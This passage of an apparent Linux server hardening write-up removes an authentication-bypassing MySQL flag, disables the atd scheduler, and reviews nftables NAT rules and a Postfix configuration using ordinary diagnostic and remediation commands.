Process: 527 ExecStartPre=/usr/share/mysql/mysql-systemd-start pre (code=exited, status=0/SUCCESS)
Main PID: 608 (mysqld)
Status: "Server is operational"
Tasks: 38 (limit: 1116)
Memory: 362.1M
CPU: 1min 7.490s
CGroup: /system.slice/mysql.service
└─608 /usr/sbin/mysqld --skip-grant-tables
Feb 02 07:59:14 ls-2024-9 systemd[1]: Starting MySQL Community Server...
Feb 02 07:59:21 ls-2024-9 systemd[1]: Started MySQL Community Server.
root@ls-2024-9:/etc/systemd/system#
```
By removing the `--skip-grant-tables` from the `mysql.service` file and restarting the service we can fix this issue.
```bash
root@ls-2024-9:/etc/systemd/system# cat /lib/systemd/system/mysql.service
# MySQL systemd service file
[Unit]
Description=MySQL Community Server
After=network.target
[Install]
WantedBy=multi-user.target
[Service]
Type=notify
User=mysql
Group=mysql
PIDFile=/run/mysqld/mysqld.pid
PermissionsStartOnly=true
ExecStartPre=/usr/share/mysql/mysql-systemd-start pre
ExecStart=/usr/sbin/mysqld --skip-grant-tables
TimeoutSec=infinity
Restart=on-failure
RuntimeDirectory=mysqld
RuntimeDirectoryMode=755
LimitNOFILE=10000
# Set enviroment variable MYSQLD_PARENT_PID. This is required for restart.
Environment=MYSQLD_PARENT_PID=1
```
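Rather than patching the packaged unit under `/lib`, a drop-in override also works (a sketch; the drop-in file name is my choice):
```bash
# Override ExecStart via a drop-in so package upgrades do not bring the flag back.
mkdir -p /etc/systemd/system/mysql.service.d
cat > /etc/systemd/system/mysql.service.d/no-skip-grant-tables.conf <<'EOF'
[Service]
ExecStart=
ExecStart=/usr/sbin/mysqld
EOF
```
Either way, reload and restart: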
```bash
root@ls-2024-9:/etc/systemd/system# systemctl daemon-reload
root@ls-2024-9:/etc/systemd/system# systemctl restart mysql.service
```
### ATD
```bash
root@ls-2024-9:/etc/systemd/system# ps -f -p 834
UID PID PPID C STIME TTY TIME CMD
daemon 834 1 0 07:59 ? 00:00:00 /usr/sbin/atd -f
```
```bash
root@ls-2024-9:/etc/systemd/system# sudo systemctl status atd
● atd.service - Deferred execution scheduler
Loaded: loaded (/lib/systemd/system/atd.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-02-02 07:59:27 UTC; 2h 21min ago
Docs: man:atd(8)
Main PID: 834 (atd)
Tasks: 1 (limit: 1116)
Memory: 452.0K
CPU: 5ms
CGroup: /system.slice/atd.service
└─834 /usr/sbin/atd -f
Feb 02 07:59:27 ls-2024-9 systemd[1]: Starting Deferred execution scheduler...
Feb 02 07:59:27 ls-2024-9 systemd[1]: Started Deferred execution scheduler.
```
Let's check which files it has open:
```bash
root@ls-2024-9:/etc/systemd/system# sudo lsof -p 834
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
atd 834 daemon cwd DIR 252,1 4096 259122 /var/spool/cron/atjobs
atd 834 daemon rtd DIR 252,1 4096 2 /
atd 834 daemon txt REG 252,1 30888 73749 /usr/sbin/atd
atd 834 daemon mem REG 252,1 27072 3571 /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
atd 834 daemon mem REG 252,1 613064 4750 /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
atd 834 daemon mem REG 252,1 133200 3594 /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
atd 834 daemon mem REG 252,1 2220400 69316 /usr/lib/x86_64-linux-gnu/libc.so.6
atd 834 daemon mem REG 252,1 166280 3926 /usr/lib/x86_64-linux-gnu/libselinux.so.1
atd 834 daemon mem REG 252,1 67736 4671 /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
atd 834 daemon mem REG 252,1 240936 34599 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
atd 834 daemon 0u CHR 1,3 0t0 5 /dev/null
atd 834 daemon 1u CHR 1,3 0t0 5 /dev/null
atd 834 daemon 2u CHR 1,3 0t0 5 /dev/null
atd 834 daemon 3uW REG 0,25 4 1442 /run/atd.pid
```
So far nothing suspicious. But just in case, let's disable it:
- `systemctl disable --now atd`
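It is also worth checking the job queue itself (a sketch; `atq` should come back empty):
```bash
atq                              # list pending at(1) jobs
ls -la /var/spool/cron/atjobs/   # the spool directory atd had open
```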
### NFTABLES
```bash
root@ls-2024-9:/var/spool# sudo nft list ruleset
table ip nat {
chain CNI-5f87a854e5a6d82df88e3543 {
ip daddr 10.88.0.0/16 counter packets 0 bytes 0 accept
ip daddr != 224.0.0.0/4 counter packets 0 bytes 0 masquerade
}
chain POSTROUTING {
type nat hook postrouting priority srcnat; policy accept;
counter packets 1120 bytes 83208 jump CNI-HOSTPORT-MASQ
ip saddr 10.88.0.2 counter packets 0 bytes 0 jump CNI-5f87a854e5a6d82df88e3543
}
chain CNI-HOSTPORT-SETMARK {
counter packets 16 bytes 960 meta mark set mark or 0x2000
}
chain CNI-HOSTPORT-MASQ {
mark and 0x2000 == 0x2000 counter packets 16 bytes 960 masquerade
}
chain CNI-HOSTPORT-DNAT {
meta l4proto tcp tcp dport 8018 counter packets 16 bytes 960 jump CNI-DN-5f87a854e5a6d82df88e3
}
chain PREROUTING {
type nat hook prerouting priority dstnat; policy accept;
fib daddr type local counter packets 2671 bytes 127511 jump CNI-HOSTPORT-DNAT
}
chain OUTPUT {
type nat hook output priority -100; policy accept;
fib daddr type local counter packets 189 bytes 14877 jump CNI-HOSTPORT-DNAT
}
chain CNI-DN-5f87a854e5a6d82df88e3 {
meta l4proto tcp ip saddr 10.88.0.0/16 tcp dport 8018 counter packets 0 bytes 0 jump CNI-HOSTPORT-SETMARK
meta l4proto tcp ip saddr 127.0.0.1 tcp dport 8018 counter packets 16 bytes 960 jump CNI-HOSTPORT-SETMARK
meta l4proto tcp tcp dport 8018 counter packets 16 bytes 960 dnat to 10.88.0.2:22
}
}
table ip filter {
chain CNI-FORWARD {
counter packets 0 bytes 0 jump CNI-ADMIN
ip daddr 10.88.0.2 ct state related,established counter packets 0 bytes 0 accept
ip saddr 10.88.0.2 counter packets 0 bytes 0 accept
}
chain CNI-ADMIN {
}
chain FORWARD {
type filter hook forward priority filter; policy accept;
counter packets 0 bytes 0 jump CNI-FORWARD
}
}
```
DNAT for port 8018: the `CNI-HOSTPORT-DNAT` chain redirects TCP traffic destined for port 8018 to 10.88.0.2:22.
This looks unusual at first, because it translates incoming traffic on port 8018 to SSH port 22 on an internal IP address.
First, let's back up the ruleset.
```bash
sudo nft list ruleset > ~/nftables-backup-$(date +%F).nft
```
But the rule is not defined in any config file on disk:
```bash
grep -R "meta l4proto tcp ip saddr 10.88.0.0/16 tcp dport 8018 counter packets" /etc
```
This returns no match. But I guess these rules are just generated by podman/CNI for the container's published port (`podman ps` shows 8018 mapped to port 22 inside the container), so nothing to worry about.
### SMTP
```bash
# See /usr/share/postfix/main.cf.dist for a commented, more complete version
# Debian specific: Specifying a file name will cause the first
# line of that file to be used as the name. The Debian default
# is /etc/mailname.
#myorigin = /etc/mailname
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
biff = no
# appending .domain is the MUA's job.
append_dot_mydomain = no
# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h
readme_directory = no
# See http://www.postfix.org/COMPATIBILITY_README.html -- default to 3.6 on
# fresh installs.
compatibility_level = 3.6
# TLS parameters
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
smtpd_tls_security_level=may
smtp_tls_CApath=/etc/ssl/certs
smtp_tls_security_level=may
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
myhostname = ls-2024-9
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
mydestination = $myhostname, ls-2024-9, localhost.localdomain, , localhost
relayhost =
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
inet_protocols = all
```